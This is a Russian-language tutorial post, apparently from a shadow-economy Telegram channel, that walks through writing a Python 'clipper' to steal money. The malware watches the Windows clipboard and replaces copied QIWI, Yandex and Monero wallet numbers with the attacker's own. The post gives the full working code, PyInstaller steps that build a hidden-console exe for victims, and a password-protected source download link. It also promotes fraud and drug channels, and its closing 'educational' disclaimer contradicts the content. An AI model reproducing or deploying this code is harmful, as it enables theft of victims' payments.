Создаем клиппер

Создаем клиппер

Dark Place

Сегодня попробуем себя в роли разработчика вредоносного ПО, создав простенький клиппер для qiwi, яд, monero.


Предисловие

Clipper - это вирус, который мониторит буфер обмена зараженного ПК на предмет реквизитов электронных кошельков и в случае индикации таких, подменяет данные в буфере на те, которые прописал создатель.


На примере:

Предположим, что на твой пк заброшен клиппер. Например, тебе нужно оплатить какую-либо услугу или провести транзакцию. Ты копируешь номер кошелька (не важно, что это: крипта, яд, webmoney, qiwi), после того, как ты скопируешь номер кошелька, клиппер cделает подмену скопированного кошелька, на кошелек создателя. Деньги улетели в неизвестном направлении и что-либо кому-либо доказать практически невозможно. ПРОФИТ!


Перейдем к практике

Установка Python 

Переходим по ссылке - я ссылка. Скачиваем последнюю версию и устанавливаем её. 


Написание кода 

Импортируем модули, которые нам нужны:

from win32clipboard import *
from time import sleep
import os

Объявляем переменные

my_qiwi = ***QIWI***
my_yandex = ***YANDEX***
my_monero_poloniex = ***MONERO_POLONIEX***


Основная часть кода

while True:    # Постоянный цикл
    OpenClipboard()    # Открываем буфер обмена
    data = GetClipboardData()    # Считываем данные из буфера обмена
    CloseClipboard()    # Закрываем буфера обмена (правила такие xD)
    if len(data) == 12:    # Если длина равна 12 символам, возможно, что это номер телефона RU
        if (data.startswith("+79") or data.startswith("79") or data.startswith("89")): # Если начинается текст с "+79", "79", "89", то мы меняем его
            OpenClipboard()    # Открываем буфер обмена
            EmptyClipboard() # Очищаем буфер обмена
            SetClipboardText(my_qiwi) # Изменяем текст
            CloseClipboard()    # Закрываем буфера обмена
            sleep(0.1)    # Перерыв, так как если мы будем постоянно открывать буфер обмена, то вылетит ошибка: "Access denied"  
    if len(data) == 15:    # Если длина равна 15 символам, возможно, что это номер кошелка Yandex
        OpenClipboard()    # Открываем буфер обмена
        EmptyClipboard()    # Очищаем буфер обмена
        SetClipboardText(my_yandex)    # Изменяем текст
        CloseClipboard()    # Закрываем буфера обмена
        sleep(0.1)    # Перерыв, так как если мы будем постоянно открывать буфер обмена, то вылетит ошибка: "Access denied"  
    if data.startswith("4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk"):    # Если текст начинается на "4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk", то это точно номер кошелка Monero Poloniex
        OpenClipboard()    # Открываем буфер обмена
        EmptyClipboard()    # Очищаем буфер обмена
        SetClipboardText(my_monero_poloniex)    # Изменяем текст
        CloseClipboard()    # Закрываем буфера обмена
    sleep(0.1)    # Перерыв, так как если мы будем постоянно открывать буфер обмена, то вылетит ошибка: "Access denied"


Компилируем в exe, чтобы скормить наш код жертве

Воспользуемся программой PyInstaller. Ее можно установить благодаря команде, которую нам нужно ввести в CMD: pip install pyinstaller. Вот аргументы Pyinstaller'a, которые мы будем использовать:

1) -F, соберет все файлы в один exe файл .

2)-w, отключит консоль .

3)-i ***путь к иконке***, аргумент,который подключит к программе иконку .

Финальная команда для CMD: pyinstaller -F -w -i ***путь к иконке*** ***путь к файлу .py***.


Исходники 

Ссылка для скачивания: https://filecloud.me/ydcox8pbql7p.html
Пароль: h0peIess


Также можно в интернете найти исходники скриптов, которые добавят этот вирус в StartUp, будут скрывать от Диспетчера Задач.

Заветы Трампа - Твой проводник в богатую жизнь!

RUSSIAN AGRESSOR - Секс, оружие, наркотики, обнал. Твоя порция трэша!

Подполье 2.0 - Возрождение теневого чата манимейкеров!


ДИСКЛЕЙМЕР

Данная статья представлена исключительно в ознакомительных целях и не несет призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.

Создано с помощью Tgraph.io